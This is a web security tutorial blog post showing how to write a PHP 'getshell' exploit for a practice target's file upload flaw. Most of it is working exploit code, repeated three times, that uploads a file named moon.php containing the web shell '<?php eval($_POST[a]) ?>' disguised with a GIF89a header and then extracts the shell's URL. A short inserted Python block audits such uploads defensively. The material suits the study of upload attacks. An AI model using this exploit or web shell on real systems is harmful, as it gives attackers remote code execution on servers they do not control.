
Sep 27 2018

Web Security Chapter 7: Writing Exploits, Part 3


Web Security Chapter 7, Writing Exploits Part 3: Writing a GETSHELL


In the previous part I showed you how to write an exploit for a POST injection. This part is also about POST submissions: many students like GETSHELL, so how do you write a GETSHELL script?

Getshell means obtaining access directly: either executing commands directly, or uploading a trojan (a web shell, i.e. getwebshell).

Open the 暗月 practice target system and go to the upload vulnerability test.


[Screenshot: 13.png]

[Screenshot: 14.png]


Testing shows that the upload vulnerability test page allows an image trojan to be uploaded directly. Capture the request with Burp Suite.


POST /upload.php HTTP/1.1
Host: target_sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://target_sys.com/upload.php
Content-Type: multipart/form-data; boundary=---------------------------86531354118821
Content-Length: 23124
Cookie: PHPSESSID=8fj89vrpvaavg5sc92ifg5gu75
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------86531354118821
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

GIF89ad




Writing the GETSHELL in PHP uses the socket extension; make sure php.ini enables socket.dll.


function http_send($host, $packet){

        // Open a plain TCP connection to port 80, retrying once on failure
        $sock = fsockopen($host, 80);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 Trying again...";
                $sock = fsockopen($host, 80);
        }
        
        // Write the raw HTTP request, then read the response until the server closes
        fputs($sock, $packet);
        
        $resp = '';
        while (!feof($sock)) {
                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}


The code above simulates sending the POST packet and receiving the response.


function data($host,$filename){

        // multipart/form-data body: the file part followed by the "sub" form field
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
        $payload .= "Content-Type: image/jpeg\r\n\r\n";
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"sub\"";
        $payload .= "\r\n\r\n";
        $payload .= "12132\r\n";
        $payload .= "-----------------------------86531354118821--\r\n";
        // HTTP request line and headers; Content-Length must match the body
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;

        return $packet;

}




This simulates the POST submission; after processing, it is identical to the captured packet.


The ---------------------------86531354118821-- part is the boundary, which must match the one in the form submission's Content-Type header.


[Screenshot: 16.png]


$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";


This part is the content of the image trojan you want to upload.



$filename  = "moon.php";
$host = "target_sys.com";
print http_send($host,data($host,$filename));



$filename is the name of the uploaded file, and $host is the domain name.

Below is the getshell code. Save it as exp2.php.
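From the defender's side, this same packet structure is what an upload handler has to inspect before storing anything. The following Python example (added here; it is not part of the original post or of the target system's code) parses a constructed multipart body shaped like the request above and lists why each file part should be rejected: an extension outside the image allowlist, content that does not start with the signature the extension implies, or a PHP open tag embedded in the upload. The allowlist and the signature table are assumptions.

```python
import re

# Constructed sample, not the page's code: a body shaped like the request above.
BOUNDARY = "---------------------------86531354118821"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="file"; filename="moon.php"\r\n'
    "Content-Type: image/jpeg\r\n\r\nGIF89a\r\n<?php eval($_POST[a]) ?>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="sub"\r\n\r\n12132\r\n'
    f"--{BOUNDARY}--\r\n"
).encode()

# Assumed extension allowlist, each with the file signature its content must begin with.
ALLOWED_EXT = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
               "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

def parse_multipart(body, boundary):
    """Split a multipart/form-data body into (headers, data) parts."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.strip(b"\r\n").split(b"\r\n"):
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode()] = value.strip().decode()
        parts.append((headers, data[:-2] if data.endswith(b"\r\n") else data))
    return parts

def reject_reasons(filename, data):
    """Reasons to refuse one file part; an empty list means it may be stored."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    reasons = []
    if ext not in ALLOWED_EXT:
        reasons.append(f"extension '{ext}' not in image allowlist")
    elif not data.startswith(ALLOWED_EXT[ext]):
        reasons.append(f"content lacks the {ext} file signature")
    if PHP_TAG.search(data):  # a GIF89a prefix does not make embedded PHP harmless
        reasons.append("PHP open tag embedded in upload")
    return reasons

def audit(body, boundary):
    """Map each uploaded filename to its rejection reasons (empty = accept)."""
    found = ((re.search(r'filename="([^"]*)"', h.get("content-disposition", "")), d)
             for h, d in parse_multipart(body, boundary))
    return {m.group(1): reject_reasons(m.group(1), d) for m, d in found if m}
```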


<?php

function http_send($host, $packet){

        // Open a plain TCP connection to port 80, retrying once on failure
        $sock = fsockopen($host, 80);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 Trying again...";
                $sock = fsockopen($host, 80);
        }
        
        // Write the raw HTTP request, then read the response until the server closes
        fputs($sock, $packet);
        
        $resp = '';
        while (!feof($sock)) {
                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}



function data($host,$filename){
        
        // multipart/form-data body: the file part followed by the "sub" form field
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
        $payload .= "Content-Type: image/jpeg\r\n\r\n";
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"sub\"";
        $payload .= "\r\n\r\n";
        $payload .= "12132\r\n";
        $payload .= "-----------------------------86531354118821--\r\n";
        // HTTP request line and headers; Content-Length must match the body
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
        
        return $packet;

}

$filename  = "moon.php";

$host = "target_sys.com";
print http_send($host,data($host,$filename));



Run the script, as shown in the screenshot.

[Screenshot: 17.png]


The response printed in the terminal contains a lot of content that is not wanted, so we extract the WEBSHELL path from it and return only what is needed. The complete exp is as follows:

<?php

function http_send($host, $packet){

        // Open a plain TCP connection to port 80, retrying once on failure
        $sock = fsockopen($host, 80);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 Trying again...";
                $sock = fsockopen($host, 80);
        }
        
        // Write the raw HTTP request, then read the response until the server closes
        fputs($sock, $packet);
        
        $resp = '';
        while (!feof($sock)) {
                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}



function data($host,$filename){
        
        // multipart/form-data body: the file part followed by the "sub" form field
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
        $payload .= "Content-Type: image/jpeg\r\n\r\n";
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"sub\"";
        $payload .= "\r\n\r\n";
        $payload .= "12132\r\n";
        $payload .= "-----------------------------86531354118821--\r\n";
        // HTTP request line and headers; Content-Length must match the body
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
        
        return $packet;

}


$filename  = "moon.php";
$host = "target_sys.com";
$html_str = http_send($host,data($host,$filename));

// Pull the stored path out of the HTML response; $m[1] is the capture group
preg_match("/Stored in: (.*?)</", $html_str, $m);

if (!empty($m[1])){
        echo "http://".$host."/".$m[1];
}else{
        echo "false";
}



Download the exp: exp2.rar


Run the script:


[Screenshot: 18.png]


Article tags: exp writing

Copyright notice: unless otherwise noted, this article is an original work by mOon; please keep the source attribution when reposting.
